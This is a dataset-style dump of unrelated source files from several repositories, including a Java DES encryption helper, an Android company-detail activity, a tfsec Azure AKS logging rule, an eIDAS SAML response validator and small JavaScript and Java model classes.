repo_name
stringlengths
6
101
path
stringlengths
4
300
text
stringlengths
7
1.31M
geegloirco/geeglo-store
store-server/src/main/java/ir/geeglo/dev/store/business/SecurityBusiness.java
<reponame>geegloirco/geeglo-store package ir.geeglo.dev.store.business; import ir.piana.dev.secure.crypto.CryptoAttribute; import ir.piana.dev.secure.crypto.CryptoMaker; import ir.piana.dev.secure.key.SecretKeyAlgorithm; import ir.piana.dev.secure.key.SecretKeyMaker; import ir.piana.dev.secure.util.Base64Converter; import org.springframework.beans.factory.annotation.Value; import org.springframework.beans.factory.config.ConfigurableBeanFactory; import org.springframework.context.annotation.PropertySource; import org.springframework.context.annotation.Scope; import org.springframework.stereotype.Repository; import javax.annotation.PostConstruct; import javax.crypto.SecretKey; /** * @author <NAME>, 10/14/2018 */ @Repository("SecurityBusiness") @PropertySource(value = "classpath:application.properties") @Scope(value = ConfigurableBeanFactory.SCOPE_SINGLETON) public class SecurityBusiness { private static final String INTERNAL_KEY = "<KEY>; private static SecretKey internalKey; @Value("${security.secret-key.des}") private String secureKeyString; private SecretKey secretKey; static { try { internalKey = SecretKeyMaker.asSecretKey(INTERNAL_KEY, SecretKeyAlgorithm.DES); } catch (Exception e) { e.printStackTrace(); } } @PostConstruct public void init() { try { String decryptedSecureKey = decryptDesEcbPkcs5paddingFromBase64Internal(secureKeyString); secretKey = SecretKeyMaker.asSecretKey(decryptedSecureKey, SecretKeyAlgorithm.DES); } catch (Exception e) { e.printStackTrace(); } } private static String encryptDesEcbPkcs5paddingAsBase64Internal(String rawString) throws Exception { return Base64Converter.toBase64String( CryptoMaker.encrypt(rawString.getBytes("UTF-8"), internalKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING)); } private static String decryptDesEcbPkcs5paddingFromBase64Internal(String encrypted) throws Exception { return new String(CryptoMaker.decrypt(Base64Converter.fromBase64String(encrypted), internalKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING), "UTF-8"); } public String encryptDesEcbPkcs5paddingAsBase64(String rawString) throws Exception { return Base64Converter.toBase64String( CryptoMaker.encrypt(rawString.getBytes("UTF-8"), secretKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING)); } public String decryptDesEcbPkcs5paddingFromBase64(String encrypted) throws Exception { return new String(CryptoMaker.decrypt(Base64Converter.fromBase64String(encrypted), secretKey, CryptoAttribute.DES_ECB_PKCS_5_PADDING), "UTF-8"); } // public static void main(String[] args) throws Exception { // boolean encryptType = true; // String property = System.getProperties().getProperty("crypto-type"); // if(property != null && property.equalsIgnoreCase("dec")) { // encryptType = false; // } // // for(String arg : args) { // if(encryptType) // System.out.println(SecurityBusiness // .encryptDesEcbPkcs5paddingAsBase64Internal(arg)); // else { // System.out.println(SecurityBusiness // .decryptDesEcbPkcs5paddingFromBase64Internal(arg)); // } // } // } }
WeiEast/qihaosou
app/src/main/java/com/qihaosou/ui/activity/EnterpriseDetailInfoActivity.java
<reponame>WeiEast/qihaosou<filename>app/src/main/java/com/qihaosou/ui/activity/EnterpriseDetailInfoActivity.java<gh_stars>0 package com.qihaosou.ui.activity; import android.content.Context; import android.content.Intent; import android.graphics.drawable.Drawable; import android.os.Bundle; import android.support.annotation.Nullable; import android.view.LayoutInflater; import android.view.View; import android.view.ViewGroup; import android.widget.AdapterView; import android.widget.BaseAdapter; import android.widget.ImageView; import android.widget.TextView; import android.widget.Toast; import com.lzy.okhttputils.OkHttpUtils; import com.lzy.okhttputils.callback.BeanCallBack; import com.lzy.okhttputils.https.TaskException; import com.qihaosou.R; import com.qihaosou.bean.BaseBean; import com.qihaosou.bean.HomePageGridViewBean; import com.qihaosou.bean.HomepageBean; import com.qihaosou.bean.IcinfoBean; import com.qihaosou.bean.IcinfoBody; import com.qihaosou.bean.IcinfoListBody; import com.qihaosou.bean.QihaosouBean; import com.qihaosou.callback.HomePageBeanCallBack; import com.qihaosou.callback.QihaosouBeanCallBack; import com.qihaosou.loading.LoadingAndRetryManager; import com.qihaosou.loading.OnLoadingAndRetryListener; import com.qihaosou.net.UriHelper; import com.qihaosou.util.L; import com.qihaosou.util.ToastUtil; import com.qihaosou.util.UIHelper; import com.qihaosou.view.LineGridView; import java.util.ArrayList; import java.util.List; import okhttp3.Request; import okhttp3.Response; /** * Created by Administrator on 2016/1/20. * 企业详情 */ public class EnterpriseDetailInfoActivity extends BaseActivity implements View.OnClickListener{ private String uuid; LoadingAndRetryManager mLoadingAndRetryManager; private LineGridView gridView; int[] resId = {R.mipmap.item_image_01,R.mipmap.item_image_02,R.mipmap.item_image_03,R.mipmap.item_image_04, R.mipmap.item_image_05,R.mipmap.item_image_06,R.mipmap.item_image_07,R.mipmap.item_image_08,R.mipmap.item_image_09,R.mipmap.item_image_10,R.mipmap.item_image_11,R.mipmap.item_image_12}; String[] titles = {"工商信息","工商变更","年报","网站信息","商标","专利","著作权","法院诉讼","失信信息","资质","招聘","招投标信息"}; private TextView btnAttent; private TextView btnComment; private TextView econ_nameTV,oper_nameTV,regist_capiTV,start_dateTV,register_statusTV,econ_kindTV,refreshTV; private TextView readCountTV; private List<IcinfoBean> list; private List<HomePageGridViewBean> gridViewlist; private HomePageGridViewAdapter gridViewAdapter; private HomepageBean homepageBean; //浏览量 private int readCount; //工商更改数量 private int changerecordsCount; //年报数量 private int annualCount; //网站数量 private int webCount; //商标数量 private int logoCount; //专利数量 private int patentCount; //著作权数量 private int copyrightCount; //法院诉讼数量 private int courtCount; //失信信息数量 private int dishonestyCount; //资质数量 private int qualificationCount; //招聘信息数量 private int recruitCount; //招标数量 private int tendersCount; //关注状态 private Boolean attentionStatus=false; //企业头像 private String companyAvatar; //创建时间 private String createDate; @Override protected void init() { gridView= (LineGridView) findViewById(R.id.line_gridview); mLoadingAndRetryManager = LoadingAndRetryManager.generate(this, null); //公司名称 econ_nameTV= (TextView) findViewById(R.id.tv_infodetial_name); //公司类型 econ_kindTV= (TextView) findViewById(R.id.tv_infodetial_type); //公司营业状态 register_statusTV= (TextView) findViewById(R.id.tv_compdetail_status); //法定代表 oper_nameTV= (TextView) findViewById(R.id.tv_compdetail_opername); //注册资本 regist_capiTV= (TextView) findViewById(R.id.tv_compdetail_registcapi); //成立日期 start_dateTV= (TextView) findViewById(R.id.tv_compdetail_checkdate); //更新时间 refreshTV= (TextView) findViewById(R.id.tv_infodetial_refresh); //关注 btnAttent= (TextView) findViewById(R.id.tv_infordetial_attention); //阅读量 readCountTV= (TextView) findViewById(R.id.tv_detailinfo_attention); //评论 btnComment= (TextView) findViewById(R.id.tv_infordetial_comment); } @Override protected void addListener() { gridView.setOnItemClickListener(new AdapterView.OnItemClickListener() { @Override public void onItemClick(AdapterView<?> parent, View view, int position, long id) { if(homepageBean==null){ ToastUtil.TextToast(EnterpriseDetailInfoActivity.this,"暂无公司信息"); return; } Bundle bundle=new Bundle(); bundle.putString("uuid",uuid); bundle.putString("name",homepageBean.getEconName()); int num=gridViewlist.get(position).getNum(); switch (position){ case 0: case 1: case 2: UIHelper.showEnterpriseInfoDetailsActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 3: if(isHasInfo(num)) UIHelper.showWebInfoActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 4: if(isHasInfo(num)) UIHelper.showMarkListActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 5: if(isHasInfo(num)) UIHelper.showCompanyPatentActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 6: if(isHasInfo(num)) UIHelper.showCopyRightActivity(EnterpriseDetailInfoActivity.this, bundle); break; case 7: if(isHasInfo(num)) UIHelper.showCourtListActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 8: if(isHasInfo(num)) UIHelper.showDishonestyActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 10: if(isHasInfo(num)) UIHelper.showRecruitInfoActivity(EnterpriseDetailInfoActivity.this,bundle); break; case 11: if(isHasInfo(num)) UIHelper.showTenderActivity(EnterpriseDetailInfoActivity.this,bundle); break; } } }); btnAttent.setOnClickListener(this); btnComment.setOnClickListener(this); } private boolean isHasInfo(int num){ if(num==0){ ToastUtil.TextToast(this,"暂无相关信息"); return false; } return true; } @Override protected void addData() { // loadData(); setTitle("企业详情"); uuid=getIntent().getExtras().getString("uuid"); mLoadingAndRetryManager.showLoading(); gridViewlist=new ArrayList<HomePageGridViewBean>(); initGridViewData(); gridViewAdapter=new HomePageGridViewAdapter(this,gridViewlist); gridView.setAdapter(gridViewAdapter); getHomePage(uuid); } private void loadData() { mLoadingAndRetryManager.showLoading(); new Thread() { @Override public void run() { try { Thread.sleep(2000); } catch (InterruptedException e) { e.printStackTrace(); } mLoadingAndRetryManager.showContent(); } }.start(); } @Override protected int getContentViewLayoutID() { return R.layout.activity_enterprise_detailinfo1; } @Override public void onClick(View v) { switch (v.getId()){ case R.id.tv_infordetial_attention://关注,取消关注 if(attentionStatus) cancelAttent(uuid); else attent(uuid); break; case R.id.tv_infordetial_comment://评论 readyGo(CommentListActivity.class); } } class HomePageGridViewAdapter extends BaseAdapter { private Context context; private List<HomePageGridViewBean> list; private LayoutInflater inflater; public HomePageGridViewAdapter(Context context,List<HomePageGridViewBean> list){ this.context=context; this.list=list; inflater=LayoutInflater.from(context); } @Override public int getCount() { return list.size(); } @Override public Object getItem(int i) { return list.get(i); } @Override public long getItemId(int i) { return i; } @Override public View getView(int i, View convertView, ViewGroup viewGroup) { Holder holder = null; if(convertView == null){ holder = new Holder(); convertView = inflater.inflate( R.layout.item_enterprise_detailinfo_gridview, null); holder.tv = ((TextView) convertView.findViewById(R.id.btn_fun)); holder.numTV= (TextView) convertView.findViewById(R.id.tv_num); convertView.setTag(holder); } else { holder = ((Holder) convertView.getTag()); } holder.tv.setCompoundDrawablesWithIntrinsicBounds(0, list.get(i).getImgId(), 0, 0); holder.tv.setText(list.get(i).getName()); if(i!=0) holder.numTV.setText(""+list.get(i).getNum()); return convertView; } } static class Holder{ TextView tv; TextView numTV; } public void setRetryEvent(View retryView) { View view = retryView.findViewById(R.id.id_btn_retry); view.setOnClickListener(new View.OnClickListener() { @Override public void onClick(View v) { Toast.makeText(EnterpriseDetailInfoActivity.this, "retry event invoked", Toast.LENGTH_SHORT).show(); } }); } private void getHomePage(String uuid){ OkHttpUtils.post(UriHelper.getInstance().getHomePageUrl(uuid)).tag(this).execute(new HomePageBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { ToastUtil.TextToast(getApplicationContext(), e.getMessage()); } @Override public void onAfter(@Nullable HomepageBean homepageBean, Request request, Response response, @Nullable TaskException e) { mLoadingAndRetryManager.showContent(); } @Override public void onResponse(HomepageBean homepageBean) { if (homepageBean != null){ EnterpriseDetailInfoActivity.this.homepageBean=homepageBean; fullinfo(homepageBean); } } }); } //初始化GridView数据 private void initGridViewData(){ gridViewlist.clear(); int[] resIds = {R.mipmap.item_image_01,R.mipmap.item_image_02,R.mipmap.item_image_03,R.mipmap.item_image_04, R.mipmap.item_image_05,R.mipmap.item_image_06,R.mipmap.item_image_07,R.mipmap.item_image_08,R.mipmap.item_image_09,R.mipmap.item_image_10,R.mipmap.item_image_11,R.mipmap.item_image_12}; String[] titles = {"工商信息","工商变更","年报","网站信息","商标","专利","著作权","法院诉讼","失信信息","资质","招聘","招投标信息"}; int[] nums={0,changerecordsCount,annualCount,webCount,logoCount,patentCount,copyrightCount,courtCount,dishonestyCount,qualificationCount,0,tendersCount}; for(int i=0;i<resId.length;i++){ HomePageGridViewBean homepageBean=new HomePageGridViewBean(resIds[i],titles[i],nums[i]); gridViewlist.add(homepageBean); } } private void fullinfo(HomepageBean homepageBean) { econ_nameTV.setText(homepageBean.getEconName()); econ_kindTV.setText(homepageBean.getEconKind()); start_dateTV.setText(homepageBean.getStartDate()); oper_nameTV.setText(homepageBean.getOperName()); regist_capiTV.setText(homepageBean.getRegistCapi()); register_statusTV.setText(homepageBean.getRegisterStatus()); refreshTV.setText(homepageBean.getUpdateTime()); changerecordsCount=Integer.valueOf(homepageBean.getChangerecordsCount()); annualCount=Integer.valueOf(homepageBean.getAnnualCount()); webCount=Integer.valueOf(homepageBean.getWebCount()); logoCount=Integer.valueOf(homepageBean.getLogoCount()); patentCount=Integer.valueOf(homepageBean.getPatentCount()); copyrightCount=Integer.valueOf(homepageBean.getCopyrightCount()); courtCount=Integer.valueOf(homepageBean.getCourtCount()); dishonestyCount=Integer.valueOf(homepageBean.getDishonestyCount()); qualificationCount=Integer.valueOf(homepageBean.getQualificationCount()); tendersCount=Integer.valueOf(homepageBean.getTendersCount()); gridViewAdapter.notifyDataSetChanged(); readCountTV.setText("" + homepageBean.getReadCount()); attentionStatus=homepageBean.getAttentionStatus().equals("0")?true:false; if(attentionStatus){ Drawable add=getResources().getDrawable(R.mipmap.add_attention, null); add.setBounds(0,0,add.getMinimumWidth(),add.getMinimumHeight()); btnAttent.setCompoundDrawables(null, add, null, null); }else{ Drawable cancel=getResources().getDrawable(R.mipmap.cancel_attention, null); cancel.setBounds(0,0,cancel.getMinimumWidth(),cancel.getMinimumHeight()); btnAttent.setCompoundDrawables(null, cancel, null, null); } initGridViewData(); gridViewAdapter.notifyDataSetChanged(); } //关注 private void attent(String uuid){ OkHttpUtils.post(UriHelper.getInstance().getAttentUrl(uuid)).tag(this).execute(new QihaosouBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { ToastUtil.TextToast(getApplicationContext(),e.getMessage()); } @Override public void onResponse(QihaosouBean qihaosouBean) { ToastUtil.TextToast(getApplicationContext(), "关注成功"); Drawable add=getResources().getDrawable(R.mipmap.add_attention, null); add.setBounds(0, 0, add.getMinimumWidth(), add.getMinimumHeight()); btnAttent.setCompoundDrawables(null, add, null, null); attentionStatus=true; } }); } //取消关注 private void cancelAttent(String uuid){ OkHttpUtils.post(UriHelper.getInstance().cancelAttentUrl(uuid)).tag(this).execute(new QihaosouBeanCallBack() { @Override public void onError(Request request, @Nullable Response response, @Nullable TaskException e) { ToastUtil.TextToast(getApplicationContext(),e.getMessage()); } @Override public void onResponse(QihaosouBean qihaosouBean) { ToastUtil.TextToast(getApplicationContext(),"取消关注"); Drawable cancel=getResources().getDrawable(R.mipmap.cancel_attention, null); cancel.setBounds(0, 0, cancel.getMinimumWidth(), cancel.getMinimumHeight()); btnAttent.setCompoundDrawables(null, cancel, null, null); attentionStatus=false; } }); } }
jinjingbo/fine-uploader
client/js/export.js
<filename>client/js/export.js /* globals define, module, global, qq */ (function() { "use strict"; if (typeof define === "function" && define.amd) { define(function() { return qq; }); } else if (typeof module !== "undefined" && module.exports) { module.exports = qq; } else { global.qq = qq; } }());
raman-bt/autopsy
KeywordSearch/src/org/sleuthkit/autopsy/keywordsearch/ContentHit.java
/* * Autopsy Forensic Browser * * Copyright 2011 Basis Technology Corp. * Contact: carrier <at> sleuthkit <dot> org * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.sleuthkit.autopsy.keywordsearch; import java.util.LinkedHashMap; import java.util.List; import java.util.Map; import org.sleuthkit.datamodel.AbstractFile; /** * Represents result of keyword search query containing the Content it hit * and chunk information, if the result hit is a content chunk */ public class ContentHit { private AbstractFile content; private int chunkID = 0; ContentHit(AbstractFile content) { this.content = content; } ContentHit(AbstractFile content, int chunkID) { this.content = content; this.chunkID = chunkID; } AbstractFile getContent() { return content; } long getId() { return content.getId(); } int getChunkId() { return chunkID; } boolean isChunk() { return chunkID != 0; } @Override public boolean equals(Object obj) { if (obj == null) { return false; } if (getClass() != obj.getClass()) { return false; } final ContentHit other = (ContentHit) obj; if (this.content != other.content && (this.content == null || !this.content.equals(other.content))) { return false; } if (this.chunkID != other.chunkID) { return false; } return true; } @Override public int hashCode() { int hash = 3; hash = 41 * hash + (this.content != null ? this.content.hashCode() : 0); hash = 41 * hash + this.chunkID; return hash; } static Map<AbstractFile, Integer> flattenResults(List<ContentHit> hits) { Map<AbstractFile, Integer> ret = new LinkedHashMap<AbstractFile, Integer>(); for (ContentHit h : hits) { AbstractFile f = h.getContent(); if (!ret.containsKey(f)) { ret.put(f, h.getChunkId()); } } return ret; } //flatten results to get unique AbstractFile per hit, with first chunk id encountered static LinkedHashMap<AbstractFile, Integer> flattenResults(Map<String, List<ContentHit>> results) { LinkedHashMap<AbstractFile, Integer> flattened = new LinkedHashMap<AbstractFile, Integer>(); for (String key : results.keySet()) { for (ContentHit hit : results.get(key)) { AbstractFile abstractFile = hit.getContent(); //flatten, record first chunk encountered if (!flattened.containsKey(abstractFile)) { flattened.put(abstractFile, hit.getChunkId()); } } } return flattened; } }
infamous19/gerrit
java/com/google/gerrit/extensions/common/GroupInfo.java
<reponame>infamous19/gerrit<filename>java/com/google/gerrit/extensions/common/GroupInfo.java // Copyright (C) 2015 The Android Open Source Project // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package com.google.gerrit.extensions.common; import java.sql.Timestamp; import java.util.List; public class GroupInfo extends GroupBaseInfo { public String url; public GroupOptionsInfo options; // These fields are only supplied for internal groups. public String description; public Integer groupId; @Deprecated public String owner; @Deprecated public String ownerId; public Timestamp createdOn; public Boolean _moreGroups; // These fields are only supplied for internal groups, and only if requested. public List<AccountInfo> members; public List<GroupInfo> includes; }
gminteer/tenpai-buddy
client/src/slices/me.js
import {createSlice} from '@reduxjs/toolkit'; const initialState = {_id: null, email: '', profile: {_id: null, username: ''}}; const reducers = { update(state, {payload}) { return payload; }, }; const slice = createSlice({ name: 'me', initialState, reducers, }); export const {update} = slice.actions; export default slice.reducer;
PlexPt/gh4a
app/src/main/java/com/gh4a/resolver/CommitDiffLoadTask.java
package com.gh4a.resolver; import android.content.Intent; import android.support.annotation.VisibleForTesting; import android.support.v4.app.FragmentActivity; import com.gh4a.activities.CommitDiffViewerActivity; import com.gh4a.loader.CommitCommentListLoader; import com.gh4a.loader.CommitLoader; import org.eclipse.egit.github.core.CommitComment; import org.eclipse.egit.github.core.CommitFile; import org.eclipse.egit.github.core.RepositoryCommit; import java.util.List; public class CommitDiffLoadTask extends DiffLoadTask { @VisibleForTesting protected final String mSha; public CommitDiffLoadTask(FragmentActivity activity, String repoOwner, String repoName, DiffHighlightId diffId, String sha) { super(activity, repoOwner, repoName, diffId); mSha = sha; } @Override protected Intent getLaunchIntent(String sha, CommitFile file, List<CommitComment> comments, DiffHighlightId diffId) { return CommitDiffViewerActivity.makeIntent(mActivity, mRepoOwner, mRepoName, sha, file.getFilename(), file.getPatch(), comments, diffId.startLine, diffId.endLine, diffId.right, null); } @Override public String getSha() throws Exception { return mSha; } @Override protected List<CommitFile> getFiles() throws Exception { RepositoryCommit commit = CommitLoader.loadCommit(mRepoOwner, mRepoName, mSha); return commit.getFiles(); } @Override protected List<CommitComment> getComments() throws Exception { return CommitCommentListLoader.loadComments(mRepoOwner, mRepoName, mSha); } }
chaspy/tfsec
internal/app/tfsec/rules/azure/container/logging_rule.go
package container import ( "github.com/aquasecurity/defsec/rules" "github.com/aquasecurity/defsec/rules/azure/container" "github.com/aquasecurity/tfsec/internal/app/tfsec/block" "github.com/aquasecurity/tfsec/internal/app/tfsec/scanner" "github.com/aquasecurity/tfsec/pkg/rule" ) func init() { scanner.RegisterCheckRule(rule.Rule{ LegacyID: "AZU009", BadExample: []string{` resource "azurerm_kubernetes_cluster" "bad_example" { addon_profile {} } `}, GoodExample: []string{` resource "azurerm_kubernetes_cluster" "good_example" { addon_profile { oms_agent { enabled = true } } } `}, Links: []string{ "https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/resources/kubernetes_cluster#oms_agent", }, RequiredTypes: []string{"resource"}, RequiredLabels: []string{"azurerm_kubernetes_cluster"}, Base: container.CheckLogging, CheckTerraform: func(resourceBlock block.Block, _ block.Module) (results rules.Results) { if resourceBlock.MissingNestedChild("addon_profile.oms_agent") { results.Add("Resource AKS logging to Azure Monitoring is not configured.", resourceBlock) return } enabledAttr := resourceBlock.GetNestedAttribute("addon_profile.oms_agent.enabled") if enabledAttr.IsFalse() { results.Add("Resource AKS logging to Azure Monitoring is not configured (oms_agent disabled).", enabledAttr) } return results }, }) }
civilizeddev/fanuc-focas
src/main/java/fwlib32/in_dsfile.java
package fwlib32; import com.sun.jna.NativeLong; import com.sun.jna.Pointer; import com.sun.jna.Structure; import java.util.Arrays; import java.util.List; /** * This file was autogenerated by <a href="http://jnaerator.googlecode.com/">JNAerator</a>,<br> * a tool written by <a href="http://ochafik.com/"><NAME></a> that <a href="http://code.google.com/p/jnaerator/wiki/CreditsAndLicense">uses a few opensource projects.</a>.<br> * For help, please visit <a href="http://nativelibs4java.googlecode.com/">NativeLibs4Java</a> , <a href="http://rococoa.dev.java.net/">Rococoa</a>, or <a href="http://jna.dev.java.net/">JNA</a>. */ public class in_dsfile extends Structure { /** path name */ public byte[] path = new byte[256]; /** file number */ public NativeLong fnum; /** offset */ public NativeLong offset; /** request file num */ public short req_num; /** size type */ public short size_type; /** comment type */ public short detail; public short dummy; public in_dsfile() { super(); } protected List<String> getFieldOrder() { return Arrays.asList("path", "fnum", "offset", "req_num", "size_type", "detail", "dummy"); } public in_dsfile(byte path[], NativeLong fnum, NativeLong offset, short req_num, short size_type, short detail, short dummy) { super(); if ((path.length != this.path.length)) throw new IllegalArgumentException("Wrong array size !"); this.path = path; this.fnum = fnum; this.offset = offset; this.req_num = req_num; this.size_type = size_type; this.detail = detail; this.dummy = dummy; } public in_dsfile(Pointer peer) { super(peer); } public static class ByReference extends in_dsfile implements Structure.ByReference { }; public static class ByValue extends in_dsfile implements Structure.ByValue { }; }
nikelin/Redshape-AS
ui/ui-bindings/src/main/java/com/redshape/ui/data/bindings/views/DefferedModel.java
/* * Copyright 2012 <NAME> * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.redshape.ui.data.bindings.views; import java.util.List; import com.redshape.utils.beans.bindings.IBeanInfo; public class DefferedModel extends AbstractView<IBeanInfo> implements IDefferedModel { public DefferedModel( IBeanInfo type ) { super(type); } @Override public void addChild(IViewModel<?> model) { throw new UnsupportedOperationException("not supported in deffered type"); } @Override public List<IViewModel<?>> getChilds() { throw new UnsupportedOperationException("not supported in deffered type"); } }
FMudanyali/libjsdl
src/main/java/org/libsdl/api/filesystem/SdlFilesystem.java
package org.libsdl.api.filesystem; import com.sun.jna.Pointer; import org.libsdl.jna.JnaUtils; import org.libsdl.jna.NativeLoader; public final class SdlFilesystem { public static String SDL_GetBasePath() { Pointer path = NativeFunctions.SDL_GetBasePath(); return JnaUtils.extractStringAndReleaseNativeMemory(path); } public static String SDL_GetPrefPath(String org, String app) { Pointer path = NativeFunctions.SDL_GetPrefPath(org, app); return JnaUtils.extractStringAndReleaseNativeMemory(path); } private static final class NativeFunctions { static { NativeLoader.registerNativeMethods(NativeFunctions.class); } public static native Pointer SDL_GetBasePath(); public static native Pointer SDL_GetPrefPath( String org, String app); } }
phatblat/macOSPrivateFrameworks
PrivateFrameworks/PassKitUI/PKAutocompleteViewControllerDelegate-Protocol.h
<filename>PrivateFrameworks/PassKitUI/PKAutocompleteViewControllerDelegate-Protocol.h<gh_stars>10-100 // // Generated by class-dump 3.5 (64 bit). // // class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2013 by <NAME>. // #import "NSObject.h" @class NSIndexPath, NSView, PKAutocompleteViewController; @protocol PKAutocompleteViewControllerDelegate <NSObject> - (void)autocompleteViewControllerDidFinish:(PKAutocompleteViewController *)arg1; - (NSView *)autocompleteViewController:(PKAutocompleteViewController *)arg1 viewForRowAtIndexPath:(NSIndexPath *)arg2; - (NSView *)autocompleteViewController:(PKAutocompleteViewController *)arg1 viewForHeaderInSection:(long long)arg2; - (long long)autocompleteViewController:(PKAutocompleteViewController *)arg1 numberOfRowsInSection:(long long)arg2; - (long long)numberOfSectionsInAutocompleteViewController:(PKAutocompleteViewController *)arg1; @optional - (void)autocompleteViewController:(PKAutocompleteViewController *)arg1 didSelectRowAtIndexPath:(NSIndexPath *)arg2; @end
swedenconnect/eidas-eu-mock
EIDAS-Sources-2.5.0-SNAPSHOT-MDSL/EIDAS-SAMLEngine/src/main/java/eu/eidas/auth/engine/core/validator/eidas/EidasResponseValidator.java
/* * Copyright (c) 2019 by European Commission * * Licensed under the EUPL, Version 1.2 or - as soon they will be * approved by the European Commission - subsequent versions of the * EUPL (the "Licence"); * You may not use this work except in compliance with the Licence. * You may obtain a copy of the Licence at: * https://joinup.ec.europa.eu/page/eupl-text-11-12 * * Unless required by applicable law or agreed to in writing, software * distributed under the Licence is distributed on an "AS IS" basis, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or * implied. * See the Licence for the specific language governing permissions and * limitations under the Licence. * */ package eu.eidas.auth.engine.core.validator.eidas; import eu.eidas.auth.commons.EidasParameterKeys; import eu.eidas.auth.commons.EidasParameters; import eu.eidas.engine.exceptions.ValidationException; import net.shibboleth.utilities.java.support.xml.SerializeSupport; import org.opensaml.saml.common.SAMLVersion; import org.opensaml.saml.saml2.core.Response; import org.opensaml.saml.saml2.core.StatusCode; import org.w3c.dom.Element; import java.util.Objects; import java.util.Optional; import java.util.stream.Stream; import static eu.eidas.auth.engine.core.validator.eidas.EidasValidator.validateNotNull; import static eu.eidas.auth.engine.core.validator.eidas.EidasValidator.validateOK; import static java.nio.charset.StandardCharsets.UTF_8; /** * eIDAS validator for {@link Response}. */ public class EidasResponseValidator extends ResponseSchemaValidator implements EidasValidator { static final String[] CONSENT_ALLOWED_VALUES = { "urn:oasis:names:tc:SAML:2.0:consent:obtained", "urn:oasis:names:tc:SAML:2.0:consent:prior", "urn:oasis:names:tc:SAML:2.0:consent:current-implicit", "urn:oasis:names:tc:SAML:2.0:consent:current-explicit", "urn:oasis:names:tc:SAML:2.0:consent:unspecified", "urn:oasis:names:tc:SAML:2.0:consent:unavailable", "urn:oasis:names:tc:SAML:2.0:consent:inapplicable" }; public EidasResponseValidator() { super(); } /** * Validates a single {@link Response} and throws a {@link ValidationException} if the validation fails. * * @param response the {@link Response} to validate * @throws ValidationException when an invalid value was found */ @Override public void validate(Response response) throws ValidationException { Element node = Objects.requireNonNull(response.getDOM()); int responseSize = SerializeSupport.prettyPrintXML(node).getBytes(UTF_8).length; validateOK(responseSize <= getMaxSize(), "SAML Response exceeds max size."); super.validate(response); validateNotNull(response.getID(), "ID is required"); validateNotNull(response.getInResponseTo(), "InResponseTo is required"); validateNotNull(response.getVersion(), "Version is required."); validateOK(SAMLVersion.VERSION_20.equals(response.getVersion()), "Version is invalid."); validateNotNull(response.getIssueInstant(), "IssueInstant is required"); validateNotNull(response.getDestination(), "Destination is required"); validateConsent(response.getConsent()); validateNotNull(response.getIssuer(), "Issuer is required."); validateNotNull(response.getStatus(), "Status is required."); validateNotNull(response.getSignature(), "Signature is required."); validateOK((!StatusCode.SUCCESS.equals(response.getStatus().getStatusCode().getValue()) || !(response.getAssertions() == null || response.getAssertions().isEmpty())), "Assertion is required"); } /** * Validates the consent, it is optional, but when not null, it should be one of: * <ul> * <li>urn:oasis:names:tc:SAML:2.0:consent:obtained</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:prior</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:current-implicit</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:current-explicit</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:unspecified</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:unavailable</li> * <li>urn:oasis:names:tc:SAML:2.0:consent:inapplicable</li> * </ul> * * @param consent the consent * @throws ValidationException when the consent is invalid */ private static void validateConsent(String consent) throws ValidationException { // Consent is optional if (consent != null) { Optional<String> consentOptional = Stream.of(CONSENT_ALLOWED_VALUES) .filter(consent::equals) .findAny(); validateOK(consentOptional.isPresent(), "Consent is invalid"); } } private int getMaxSize(){ return EidasParameters.getMaxSizeFor(EidasParameterKeys.SAML_RESPONSE); } }
1725136424/gulimall
gulimall-product/src/main/java/site/wanjiahao/gulimall/product/service/CategoryService.java
<filename>gulimall-product/src/main/java/site/wanjiahao/gulimall/product/service/CategoryService.java package site.wanjiahao.gulimall.product.service; import com.baomidou.mybatisplus.extension.service.IService; import site.wanjiahao.common.utils.PageUtils; import site.wanjiahao.gulimall.product.entity.CategoryEntity; import site.wanjiahao.gulimall.product.vo.IndexCategoryLevel2RespVo; import java.util.List; import java.util.Map; /** * 商品三级分类 * * @author haodada * @email <EMAIL> * @date 2020-10-01 16:18:27 */ public interface CategoryService extends IService<CategoryEntity> { PageUtils queryPage(Map<String, Object> params); List<CategoryEntity> listWithTree(); List<CategoryEntity> listCategoryByPcid(Long pcid); void updateBatch(List<CategoryEntity> categoryEntities); List<Long> listCategoryPath(Long catelogId); CategoryEntity listById(Long catelogId); PageUtils listWithPageByBranId(Map<String, Object> params, Long brandId); Map<String, List<IndexCategoryLevel2RespVo>> listCateLevel2(); }
uryyyyyyy/scalaSamples
